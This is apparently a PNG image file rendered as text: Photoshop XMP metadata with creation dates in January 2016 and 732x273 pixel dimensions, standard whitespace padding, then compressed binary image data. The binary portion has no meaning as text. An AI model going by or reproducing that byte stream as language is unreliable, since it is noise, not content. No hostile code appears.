<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmpMM:OriginalDocumentID>xmp.did:18080b63-60d0-0b4a-a65d-56af76170233</xmpMM:OriginalDocumentID>
         <xmpMM:DocumentID>xmp.did:B3CA40AF9FF511E59C55D95145DFE051</xmpMM:DocumentID>
         <xmpMM:InstanceID>xmp.iid:a2bfce57-a5f5-bd45-8c7d-4ec05f53fb0b</xmpMM:InstanceID>
         <xmpMM:DerivedFrom rdf:parseType="Resource">
            <stRef:instanceID>xmp.iid:196bb0f4-b375-5341-be2b-af007cfacab2</stRef:instanceID>
            <stRef:documentID>adobe:docid:photoshop:1bfbeda2-9cd6-11e5-969a-96de6a77ac25</stRef:documentID>
         </xmpMM:DerivedFrom>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:a2bfce57-a5f5-bd45-8c7d-4ec05f53fb0b</stEvt:instanceID>
                  <stEvt:when>2016-01-13T10:39:32+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2016-01-13T10:37:21+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2016-01-13T10:39:32+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2016-01-13T10:39:32+04:00</xmp:MetadataDate>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>xmp.did:85A8D4AED9CE11E4830A8DE33DBE7BAE</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>65535</exif:ColorSpace>
         <exif:PixelXDimension>732</exif:PixelXDimension>
         <exif:PixelYDimension>273</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>��� cHRMz%������u0�`:�o�_�F�cIDATx��y|\U���w�}I&{�4i�}�-�(�R6�A�_7�wѯ;*n?QAA6�l-�@K�6m�4�6�d2���ǝ�I��Y&i��z���̝9��{�9����<�t�_��8y���R��kx^�A�!/mػ���
�'�,� � ��&m������t�k��6L����
2�@ �@n�@ �@n�@ �@ �@ �@ �@ �@ �@ �@ 8�8�@0�8\EW_��S�D۾Iu�p�$) �l#��e��QXq:�5��@ �`�YVV��PK�ˁte4~�Zo����ƌ�WEa�)��5F�D�
�Z_�25qr�II��x����ey�Ḱb5��e$:��q�^!��S1�ݴ�{�D�6qR'b�t)(?o�<$I&�M��E�LD��q��.�!+c���m|a}�8�y@)Qx��P�*�܈���m��6q���~�sBiӃ���.�J�Bpƌ�p.3�²,2�&�Ch�9�3h���HOX]�g+��[��e
��AQ}��B�og`��P6�
�,�D�v�A�s�tP9�Z�b2�f�L��'�+�G��ɦ���'S�:!_Q~��J' w>\��,:~�0��[����e�!r�O����̓��R̎�n:3�u��T��8vQI��S�;�P�u��$���v�Hܴ���/�%���+�hKfD'�@d�Ci�eh���܃��$%�(�y+���4=5a�9����0�2��0de�o�m�$�v��:N�mi�e�� ͻ~O*����Tξ��o�i��9��B�uqF���I�c記Jrݳ�-M�~'��:]��(}�oX��!�q�'����&�ö��,�fz%׀cO*���tc;u]	��_���!nٰݜܢ�����j>^���i���hM�'e}%ى�]�'8�o*��Yvb�:��M&�L���l�mB��c�W8E�nx8'�mI�J�d9��&Tp+q��&)�͸�����{���qz���Du�d�̢g�dMv�Ow`����:\!<�Z��/��m�L��������
2�&11剦��M�zv��?���K�/'r���.���s�[)*%p���f���A�(��w�m��̤	��Bp��3���Ҳ�L�	8U$$bY��D���1^o���3�d0��ć��r�[p�(��S�~�3c[$F{2��x��+
��8ȕ��������bZ�����'����|�9��C+�ꠗ�^ȗ��:�D�$�
�$P�o��A��N*��!Ty��t��B�k'õz3��.��E���f�8��\�7�����q:�~<��xd�d���
�,=9��Ap��;_�|�ʳHFw�x�dwݐ�e���>��;|��c�c[����]\:��?n5ES�Gu�I���1��ĸ�v?|E�(񵏣��k����$��2M0
$�a�%���.��ձ5���� �D�f���P�����H'�w�#�9��{Ts��r^<�^79W��Y�J�dF���P�u1���iS�����}-<����q�&�3�Jy�́�敖N����-��A�7�(�;�Vqڔ�~�S]��p���L>�'�j?��CU�÷V/�/l�%1q�[V�x�3I�ch�Cuu�((?�@�r�ox���;0�h�t6�gR[�Y�
]I�&���Wc"��V�f��~��$Ty�"I�0�W��-�K,�jn��	Mqp��Iu�M�'@=����[=��I�h8��EA��6I��n_�"�b��N�̫���[
�H�B˞{&��l�N�X�`#�=�{��H&012;�8vb���O�1���D��)�e��>�vE�����It���.p:z]
]��(����B�_4�9��:��2l�ќo�^��{��>'�gNho�Y�][x�%rL�Pߝ ��R�v��w���eׁ�:�C�3�eG$�7_��[fV�'��]d4'�l�����&YYY�uk���;���|iż�ꀗ/�<�O��4a�AuPZ�V��]��?�ex�3��ʞ�Q=�Š� It6==R?м]Yq#+�!?Wr���"g��)���-���E:(�q%-Fv����V��ˢ)璌�>�~鏏�����Ia�i��n��d�j:<I��IR(��o��-�T���K��BqخH�{R�C�{��g?����}1�c�d��x�J$�9����:�լ�6������6X����\xځ�[^�{���.�vQ�Y�q/>���������0�6����Z�o���x��}~�n����U�)����z�Ҹn��`��u�Sc��k�Ws��~�]Bӹw��o!���z
�W�s��i����w����wmi���ɘ�Pו஭
|�D�C�z�^^i�仧/bg$ƽ;�&�n'[6��*B��xdo��p]3�Kg��4�Rچ�,���b.nU�g,��k7�w���[�sMh_RT���_��L�	COP2�bd�3�I�����7&�:8=eV���`�w����42$�v���Z:�$)G�G����[�'�2�n�q���k����%��иuτ]��c�>�6�B((;e�}���o'�(���_�����j\r��(�<_�^�S4�\���;���/��Ȑ����dS-:.���X:I�;6����q@��M�Sl�z|B�`e3H�C�p��DR�^��2
�{�>U�L�1}֡����PL��]e�SǴ�i:n�Q�薽�b�H�1�6�>ܿF�\å�|��9�YU��d�o���=]�:q��@�$�NR3�{�A^k����S8$��9��ꀗ������{�
�9����]<�� /��Kg����-�n��:�x}/�7�Kj+X\R����޴��5sBi����!8�m���C|i��^7�����Z�g��̷���+�"�VLY��כ�Nh_��e(�:��(6-K��S�Z�Pd�;���ҝ�ދ�'&�:x�P>�]H�B*�-�Ȯ!���]����������
��E�	��*?��8P�t�7�CO
$��j�p�aQ�?F��1�KU�Ga��A�H,�ԓ�Z�P~d�3�"�J�_F_�o���Tl�_O`�ލ,;I�ًJY�c�r�$Łej��"|s�Σu�_Itn�Tc�d��'S��r�1i�78��ڷ*�-3KG�z�Fg�}HY���� {|�}\/$�4�������?����0�=�v/���t}H��l$r�O�Ԇq�R���ʯOg�W�"�U�XQ�?��f�|g��^�}����=���ô������|k�n=k	�>�ī*���)��H}����U��x��p��z��^�#����
��F3M©��;�E3ʑ%���V2���7��qזVUs^u��H|x����a(���S��R�O�.?<s	�^��o���V�Ǵ,���N^<�1a}	I��
���iE2Ҥb��G������X�����-�C��d\�m4tz�qj��
0���pS^�v�t;m��6�8�NO�o������~�F�.ߑ����V��^���ߗ&�a����
�@͠nT�d3������H����p���-��1��8\�;\�ܣhs®��,�|�;1���{?����7;\Ŕ͸����֗&�<=�8fm�̦�����Xf�ֺ���-om���>�L�Q
���.����C#��Ҳ��:�N:�?�cڌ��ku-E7~
��g{�ؾ�G]�1�A��7����GU�:F���P;@l<������m��r��j���*)���p_4���J���Y���#s�[]ƧN�M��Ş�8{��L��dFWϯ�}kXUi�wqI7�8��:x��U�XQQ�y5���������+����y�XVV8�m8��
�ڪ�b����YK8O�W�𣍻G#���YRq����!�h���AZ��#ѹC��6WYZ�X�UZ��3��[0{�@A�*$�I��F��#�j���!d�C����T�A`�q>9��p4!=�H�F���=�Yyo�`}5ѹ��=����{�cY&�#ѹ�ֺ�h�pX!��"��*��:�NFV<����6���u��U~��K�q��L��W��K�':�北������:X�L?���J"��C�7nf�ǀ�rcf3Ǽ/��(���@�@cM�,��s��͍D~��ъ�~m�����gt9<^�-<�˳4'�[Z��ܺqD�����Y�J�x��V��l�r9����I�!6�vR�q��&ь�Ӎ�\6sʀ�{gO+eS�#}��
=|��9�*<�{k�� �f4>�7��{�Y����䫫��w�%3(�ρ0�nb�߃"�};��w����ee���d�k�0nm���C�Z���:m�{|�h}��Iq���dtm�b�G��7�8�
#+�~�\G�����-�K&�L6�>���$�I6�- ��ԡ�
�����Ĝ��!o��n�>�6�WS�{iox���];I�S6�
�s�ܞ$�	G�ޓ�q�W0�l�}�>���(�xc��z����8O��1��Ug%���M�к�4��dt�D��^+�B�i�J%�	�������඲�crݿ�Ѡ��b�Dz=��$��0&�}zU	~Ǒ����;pVR3Fz#
��|ļg޴���aҒ�W]�C�mq�
7�:�=]	*}nnۼ����ӚH��
;�a�c��#	�Q����QI:R�:qZ7z-�-�4Ԕsݢ�^��P��+/lE�$4Ӟ��S�o��7��
�qby!_^9�bl7�;ި�UfLm�7�#x���_�\��G���&������nX�︶���;��py��dː����=�W����-��3�Cg�=ʸ�=?�~�c��}�r�H�SÊ�!I2����?���Adŝ��O̸�8|v�#��#�*�dːQ�-��:�}�x��'�=�ĕ��܆������w^�g���}ԭ��Rl�F�����Dl�:��J�!�13�@v��^r��R���dF<ԏ[_2cQ:n�e�͑��X�o3e>�1	n��Ǹ�F��Q��#����]����C��_�{LvG��=aA����y��iT�=�%3<{ �Ѵ��FU�6���U�%�3��w_��K��iLmp�BH��(�q%5o�_���浤c
G,6�j!݉�hI����`�����S6��x�H�Ѷ�~=9�
m󾔎7���F�]�U���cц�����[��w2�sVa	w��P�Y���G����
���ח,��/d�M������w[�>�6�S"����<=��Kܾ��ΥJٌ+i��~Q���)Rl�i��3�X�1�V&�߇;�Dr8s�ڭA��:4OH/V:5����9j�e`�y�Kc��l�7��yyya��C}w�����$G���V�Ѭx����N[8p"Sdʽnڒvu�I�F�͐�V;�ɶ�׻��«~����8.m�{�zn�P$����Dz�B����Q��j��R�_v��]�q{���6��+e�|i��mݴ��+c�cn��U<l!��(ZB&q��8�2I��{�0�p�:&�J�/��N�g@�	U�II�%��k��¯?$�V���gG����b�Lh_�$��
}�j*V�':��(Z��[>l�V���=)�Ch��
�m}]�Q4��f���;�i��	i��2OO��a��?5V+���V6'(�N��x�#���Al�:�����O��(H��/:Io;N�>�[v{У�IӗOj3���f&����㌴
c�D�8���y[G7wn���9�|��H��JK'��<�����s�Ky#%��r�z>��K=@�o�ߛ���i�����Q��sM�qiCw�Q���"�����_d~t�LN�e����}lj�2;��Eә�s��3�+-�9W��Ŷ{Ėp7o��Cf��WzXUY�W�4���d��.I���paäe�e�Ȧ�H����#�jV:-��t$I�#��]��P��
��l�uuP�A��P�G���h8�{�+�L�	8�"Tgh	C�&ֱi��A��:��xcj��W�,}Xa!-S�}�#t���;0�������P�̑�s�v?�MU�ZH:�@ǁ'��[v�r6Wј�B��=}��ӓ���!���FQ�ƨ����V���/��~�t�7M{�GV�T��-)
��`�q!���tzR��9�!9�h�0.QJ��U��N"_�G�Ż�ֳ�q�`xNuY��p]3?xe{��d��a�/��'�����8-�������{ǵ
`�پu�n���"�,�B~�qy�vAM��G�6�6ڒ>��7���|p�>}�\�L����bY�o����mm`Ck縶�h+_Z9oXb[7G�o\��:,˗e�d���:^���aZ��Kkݟ���h��s�ed1u{Pfd�1_����:���:�6����4�XV^
W��>y*���	�8ʿ�8�S�Y_�D��
=}���X�0��s�L��EZ�L�{iox�X�kd�����e���u,򋅅i�QToHÞ�������f��'�����ԆL��ֺ{u��$���S
������`�SH�J�uIQ�1�k��E��B"�ܣq)�{_:RR��m�@
דG��:�O��3��*����e�.���5���]��W��/ng,ɿ���tce7���L��s��͗W��Y��a~�a�p#f��
}I���k�ռw~
_z~�Tq�|{��֎nn�|(&rgF㾝�ʪy|��7Hj���kT��O�o�;���u��̪\�̆�NN*��tܪ�rX��f��H����Dz2��c
��dS��ٮ1�82Rn@�>1}i0-NW��*Ϥ�|���������p�,��ϑK�fX�[��r�Z�L�_��ې�ދ�h��w���p��v��vb��:qzJq������U�8�z?Fz�IW�K�ּ��i�I�_��X�kc����>��ID^ڐ�7Ҳ�*f^�����	Z��#�?����I�,#�*V��f���ݞ�_��`�����A�(��C&���`�賃'ǹ�SD���k�m��7}-y�#�Y{v��i�
�9Kq���N�*�����������6��Ak�P�p�
gV��5��6-�?�h��OX���=�5���Ϛ�M4'�xT���k�Ά�$I��-3+�ц�\8�����
꣉	m�I�!�in~q;������X�o7}OR�u͑�TGՆֺ�	=ә/׊�a���a֍����Ha�ivdŃ�����4���b��|��/��oڰF�l����&�:x�Iu�
x��GՆT�C��8|�?c]���.�l��n;}�+�f�����g�2c�����.�ʅ*�4==)�7�<=��Ț���W�S2�&Z����Y�9��6�-{�%�80鮃�N�!U��f�t
��e���W.7 �J"I����,�ykC�?bR���Ð�q�� t�'���nø�VJ%��h�����};�=���3��-'.[6�w̙��(s���^KJ���s��+��[����똴����}jz_��Z$��lB�$:���%��ɍLxx��*���̟���8��/�G݆B��Y�~�lhE3MvwƩ	z���a�Wv���u���c4���$b�г�	�KGhM�w
��bZ��g�{�t��Y��
����j\*�8�HӿN`�>�6��(��M���]�W�e艑.j�r?-�i�� HRn��u�ǥ7�<=	�[2��#�nSO����[�L��'���40�~�Kz�]n,���T���2�>�m��~���Ij�'�vOr��~G���~�1�6���f5:r�/��ƣ���ۣܴv�V�qime����
�AiOW�G���TC�Ѣy�k�,*��N�eqI��8��8Uέ.c��˽n�G"�G݆�ETY⥃��ts"��++��L�o�����y�K�@V\�
�f��>.m�3�{��q���:%��O`�-�F�R�r��K#9NO�p"�M��c�����O�W8����v4���Bqе�#F ��m8��I@��0��6�4-{����6X�4XRO�m�2�A��Hn�nO�	nEY�7Z�6D�	E��WD)��`�q��D�ɘ�0.���7��I'����<��ʼ�'���[���—��NjF.l`�Wۺ����X��=ʓ��\p�p>mj1�M-fK�����e���[����6�󯆶	����gT�kYY��
�	z�&���k����囊�WE{���2�yh[�ej4�#j.Y�ޛ�~Pu�1���Ka���.�����Q�5���>��d:�4������M��Ȋ�r{�?�*�a$�UH��-<^���w3�Cu�d��4ヌ��p��гQ:<�/��qK:����=%X���z�cGe�zbX���$(sls��N"����G�"���ӵ�X���q$�A䮟at���`Y��#�\��がa��WwcXͨ ��~k!��s��XT`��h<����h�71���vn���1sRE��k�8�����eW���+�_�$I!Ty&�m/�l��AH�1k���D�=���*��S��`2fa4�_�ǵ�������(G�����Xd.o%��3I������-��]jod�ih1����b)dž�Q��>e�5mM(ǼN�Tw�u|i$C�-�}�Kf4`��]�Cl�B;x(��t�es�
`tw��7�}�����o(n��{��W���3N}w�mv��w��g�zj��|G$��/m�u7��eIik�'Ll��̷���������d�:KOF�tizj�!�E�ke�pz+�&[F�n
NO]-�Mx��o%�o�'��&޶aM���/}���D�������'m[w�ޓɮ�x���9ꅋ�U��_M,�����������'�d�CcW�����޾��>���K�ןG!��<���P�eu6�v
�{��|�ے�� 7��|��m�N�!,� �(�9�R�u�⥔׾���%�<82��Fٌ+1��։X#�=�Ix�����c��a�Y��/Zb�c�ӑ�H��u�e+)�q%�u�������2�j߁e�t�� ��s���)��_�mavG�8�;j[�-+Z�vK�,����$<'���e'��[n����+N]W�B�	�gu^k��3��2�h���l�u�|滙:��dг�r[����q�8��,�囚���	���[��g�'�t���}�t~ڐ���^*f���9�#�lιV�^qp��a��u����eg���Pј~#�6�����+���(��G���t���2���s(��Upw�ȿ_'BpTR�z�v�NA�*�����nG�ГD���ݶdNN�_��7�TM;�|s�k�umL=I,����uhcK��_�M/4����oEkn$|���D�-�4��Ä�?"NĤ�ǯ_��
C�9�/"�%N�@ �[ �,�7�����@ 8f�7���¡O �@ �[ �@ �[ �@ �-�@ L�eY�,�@ ㄰p�@ Bp�@ �'����>%O\��7?�Y�?4i���{�y�k'm=��zwo=_��;&m=����z��x�g�7����?=i�yʅ?�S���
��Vp�S ���dZ��]��X.%�@ ���@ ���@ �@n�@ �@n�p�Ğ�@ ��̄D)9���w̩��禡;ɟv4�3�t'cIi�Kk�P�uq ��=��ON��r����4�t
����~�dbr���B.�44��b��&�TJ�}�@ ���gO+�'�A�Yb+}n����u�y��kҜ�S���j{�Y�u1�(��w�%�=���Z>ǔj��s�=^��
$�����RI��>>)���V�(������A-.����
X��uk�(���]J��spy+�$mA	�2ȦZ�4=C6�"N�@ 8~��b��C�k��O�}���*�t��	�J�����ᨚN���z}��c
��:�y��S�T���eXs9f,�R\J�o�z�!�g��QYE���ڠ�x���s�,��
$U���1�1�P1���7��;���sQ]�X(��f�t|]M�aYƤ���SAh�Y8=eH�}NM#C2ZG��_����<�OO����(���ȦZ�G����:y��.�_��
���2u��v�;IFw���˦_��75���Yȁm��L ��{(�}���[��q�,�C���E��_�Ůqr���>|�_����}~B�_���C������~�>�O�s�i�>?���c���/
�~>f*�w1+y<xW��w��^��ɧ�X�8�=�Ǻ�������>,]XO��30�)�<:>��Y@����J�Z^R�V����TL��o/�]���̦}��虎q�g����8=�D�^R������T�_�7���xf�R�'�tD�l���;�YP�����!ɎCo��*�W8�D�"���42ǴK�QXqF�B���g��KG��Fv�F	�=>��
t\�<�~8:X���	�DQ��3
��Sp�=��/��{���M���n>fb��Kg�8��p��*���<+m��3�{	Jqـ�]���5�ԫ/��T��m��I��(%�xO^���Hr��|:���Ͼ���-d��ݪ�$�Y�
��sQB%>vN���٤��H⹧0�I<KW�b;�!�S(E�x��@o;H��ux��D����s���D�_��Ӫz((]I�lE�dZ^�R���j~�Tl_ﱁ��JN�4�#��Ii�h�s,S�c=����/^��z(���t���֑���=�_����ӎҝ\T̺��~��zʾE�8�2��~��u�z�ǑN:�F�sB�e��#t�
 �t�w'V"v��c�n@R�t�w�Qە��~$��x)��.�}mi��F��}/�
�#�Ph��3X�韡����ӧ�2Ƀ8���"{��F�Vh�������2EU���U�W���~���T܁�7ï
% �?�}nu�;y	Mǩ�8�#B��w����Z�G�֒�u���z�zV��[O��e�/�gu����S��ގZV�3�X��>�RT���ٹ�L����5
���{ҩcܮ9��y��5Go����ۍZR�[��K� cƺ���$[�׬�`�.1�Nʋ�$�@�2
*V�p���t<���#o���<����|tc��� 4�B"�K=��E�V�:�G�4�i$�v��2���h���I����n|l����O�1���D��)Ne��>�vE������薼>BW݈�z�]�{n$�ۇݒ�k_c�{���H�nw�=��Y\���1Z���=�PP���i2^�ZD<�����P�Y���3�������]O�_�\]�3^t����, X��Д�QT�Ƒ=!+�z>���5~���% �/�}^M�=�۟��T�G�tǵ��9=����`��[���~�Q-݉<��Y;����q�Y8��i����Wz�� t�G�/�~�d����oC��5�F]OG�L�g��Y;wd�lڏR��Z�����Dᅨ�����r�;�b���Q5}���[0�P�����-��Ҧ%ó����\OOp&�e�pz+�z��p���J��Np�2f奯��v�����O�q���S��膛�_5���?A��7���Wl�Sk(���D���-y������WN#t�
t��q��h����,��?�����cܣퟲ�>����-���p�F�P��V )N��1,�yI��KO �"�*@ _���i��b�k/n��+A]W�C��ˆ�i����l'u�[^�MC4IC4�G��[����bwV��;�"<KW�*v��I#���ғ��^?n3�]�1e�!��U�1��)��^�tT����t�=��^?n+�CG-�r��k����!Ty&�`툾�I����JҼ�[���:F_O_e�zc�l�e�Hk��A��Y�i��+��,�2�L�A񍟦���n�� ���yG�tJ�RM��"r�m��[�x����X�g�������{+ѹ�l��^M9������O�H�3�z7�n��'�v�̈́�Q�i8ܥ8ܡ1��΃�`Y���'P�IRi�����$SZ�%�r�_Kg�Z������7=>�ьƗ_��/��?������{���{'.S��v,��Wv����6��R?����7���lGU
���G��F)(Dk9�81:�$�y%T�������Mdv��{�ny=+�pΞ7�zʁ z��kjD#$_|� ���S��̮�d��8tL�}��|S)�};S�^7b1���Vl|qy+(���������E��c28t���h��"��S����}~$�{H��l$r�Oǽ�]���a�=���܈��"9]��\l����^�<�O˲H'����K&yЮs��T�>R�{1�t��<��Ӳ,2�&ұ�dR�أkݤc�I���ԙ�|k]�/���E��|�uIR(�qe���8���`���8\l�$Q�?����M�wi->��+��޶����イ�}]�����nrݢj��0v���_w��
�x�Ro������>w�V]ׂ�$^x3G���=>P܋��;�����.��e��>����
/���S��b5�cd�Rל�$_y3�@����^P�s�9i5�9��~�>�xסz���e��op#�P���t;^��^+w�%{$F�V�����C=�h�EG�dE�6L�N:�?�cZ�ꨮ���O�a�l۷��k�#���(�?�N��D�R��M�!t���0z}���{n�����B+?�Ӈ�S=e��l����~G��^�hI��QC��)I2��,�T-{�B�xI�f�1l�K��ݾ��PZsނ9T̼��}`�I[�+nJ�_��p�enx�X�kb�ΘL
��=�o���Vl��Z{���W��Wt?�g�o����
#��kq͚G�����>?�Ug�?�"Ԋ��.����9a�-x�'8�D����N�o~Df��}�1�׌YD����^�O�{�9�e��.��m��^`[���F���G5�6n�]�/`�#3�-�C�s�\	��#.'ֱ�����Q	aO��d�nF��#��o���h��ɚY���k͍D~��	�}�l�ߠ77�U�q�ܣ����λ��g����BV�H��B����Y�];�y��'��:��.��\=��{�z��7h�WL#�'8���Kz?+����f����	�-�?�=�]�u��33���b���䫫�Q�s�]l��p����#�t��g�ŦI��1:#dvl��w?��5�3��皽��C��o�փ������Y�����_��(6MR�����Ev�v��K�q��D)(:$�f�Ar����ݮ��Q����D���w�x��7���d�&d�跁$Ytxt��L��Z���d��No���X��	O�$��`f,J�o~�ָ��j���Gp���m��>����m��$���}c���K�x)n����Ѻ�n{��ώ�O�dՃ?��oJ�z�1b���~�];��Ϟp�Nw)�$�"f|�@p��KIO4���o�����w��vO4���ϝ<���g\Ķ���9�4�]����>��S�z�9��\�Z10�Af�f/>�k�B�n�]�=�����	^�0d�@��77�|i-���y�c��ų�d;	�?`�sQ7��$��z����Z60�Av�v���Y;��w������D��[�k.ô]a|~�H�� �
/�ٳml�U�(^���u�_����~ef�lF�F�8�e3����C��$��ƿ�k�c��h!F&J{�Ã�����ڎ�u�y�T�O`��v���Z�4��(��2��H@k�﷙�X`%bD��7G���~�)�բ1�8������BJ�_>@l��ݏ1W�1���(�o���Cu��-�����{�=��F�{��@ 7����C�H���#����7O]@M�˽;'Tl��'�7�:��.p;���s�
xxh�q�l�V�O��+�[������m�ğz����$����ij���S��{3;]�1/>Mr�����q/\��͐��
V6��9����g�?����	\�v�p��D�x�:����h'���P)�˯F�؉<
�y=�
/�z�%b߇e��.��fHoۄ�e1�`UT/��%V���>��bt�<G��u
*N�n�%�Mw����T̼���Zw/�ҕJWaI��u�$Y�6:<���e==�
�璜��Ыlj��L�s+���q�F�H��؄�?���i�7m�"P���ғ�)�G�e�M���Zf�,˖��iA`��~T3��TO��g^���	��,=	��'&���t��}��=������/AQ��A�{Ѷu�*|����Xm<�Q	�����|��ml?B���ɷN[���lo��m
֨S��Kg��t~�a�n'�?y6�/�}���:0.u�=� �o���1�ղJ
��A�{w������|:��\�*>|�wڹ ID��
Zc������&�ij��ݳ����UK�^q
ZC���~��ҕ�Ͽ� 4��ޓW�${�/ ���z�4�H������_<8�L�-���9�CA�*dم�� ڶ��l��Ȋ߸|�;�n�@,�����~���((?�0��h�9�]m�Q7���%'z�����J�]��ءKk�B�c����x�'�g�L�?��#&�oOj3�������㌕���_9.�����*��+*��|�g��/n�Ro(�=��?�b{iY!������]�
ClO��Ul��m�Cǯ��{�r���c���v.%�2Fg�@��#��
���)���4l�b���hM�t�K\s�?�-\H53)z��1���vO[�� ����[r~䖉�7��SPw6�%ٽ��)���p�P6�
���=H&�D�����?H�<�`�ɀDf���_��I�QX~ڀ�k����i�I�c�cd�-�C(�<�P�@�R��M�:H��fH1{��8"���J���!9N>�S #�>7�9i6��f���R���PKBӹe�����Jf�f���C༷�˺*������g=���Bv�v<'����z}�{�9��֛�?��][ǿ~�4�_�<BS����a���g����Hu�)����I6Ӻ�xfQX�z�#z�����B�b��\�������TۄGJj�55����$��=tR������ �qD�<���@ �i�$�GN�����u��8��.�Ʃ�=n$��-�!�Ty���=G�%'�>y5��F2��	��3�$��C�6�����~� �!��6b��ɗ��5o1����]$�{+��z:��օ��4�g'�y�S�ƻ��Ac��a�y��k�qΚO�!Ӱ��g���q=���$�{��Ha��>���|1�I6�y���]v��=���	/&X���g������l����Hu��A�(��C&���`�賃����)"w܊1a���m��>0dR��~
�N�5DtO������1�ݢG��hx���T Dž�
����v~M;"1���mP����R�N���U�gYY!gL-fOg��ƒ��ϟ<��τ�mǴ�ϾȎ��C�^p���!���X����A�0�1�k#�ܿPK+(z��q/>Ѷ8�[���S��}��1�u�)��D:����5g�
/�x��$_]����,]i�3'��3�����«n�5o����5ϒ�H��4�훱R��N�W�<�H��,����B�l%�<0i��餫�?�¯�-�E��kH��n[�9�x�î�o*e�`�i���Ht� Xr"���ȃd�ӳQ�m�G��	N�lƕd��_��Sb��Qt�Ǐ�Ԧ�z=dr�i3]�	�?�Ƹ�3t�
GLj�c�29Δj
���;~,��q�?��2u�EK(��V$I%�h$o��@ �܂{N�Uã*|��٘��3���q��|+'����m�ڂC����f`b�bӡ��n;��Ԁ���5O�e�5s.�%'��X����x��B��'�>�G�/=�k�B�Er�(��<'�����Tj�\�nu���p���5I�z:��N9��H�[K챿���"ΙsIn|	��$p��p/9y`=K��y!F$L�>	/\�)���?��w��`6���j}�X�U
+� P��0��֗�����]L��w�+�g/8�@��Z_"ٵ#�a�\�r�'�+��[OO��x�f��W�G� X�
��\=�������UD���2�'0h>�����`�q�e�Mj�'�LOr��~G���~�1��`e�&����ғ���VN;�7����{���WP6�
@"��u�}�Ǩ.�@0l�=��0�]I�'�A����T��|eռcg�/�C����	�H�M�y]|��Y�g�h���n��ނg��HʡS/
^�N�+N'��C$7���s�qAo�����n��>A�c��k5N����M�O�������_�����Imz�ɫ�:��X�D�ĺgI��\��_܁|�����H����S�-&ڶ����ވ'XK,�*��dڅ��� I����]J��L�L�T�>���
o����� Pz"��<b�W�l~�xd3�@
��ȒJє������*����l�q��E�	E��WD��k$�cOr���n���;2�V�wzύ�"�7]� ��=�q�Z���f:�]�����=9HFw�2Pf�I-�IbV��?}��8����㘊mE���
�����2+����bN�����H����Erݳ��+�E�_��JB�0V:�4���t��O_���bm
�����#��K�N�׼��YRF�ۯ�ʤ�;�t�Ԇ�I��vL���D��%��)�<�@��~qv�����(^j?���D��d
�V��1�w]���ut���i�wa�ݾ�dt7����C��S�QXq:��B�Z_"ѹ�@�	��#+����Ib�W�u�>!"ˆv��DŽ��8����O������]�#�"w��3<�4cQ:�
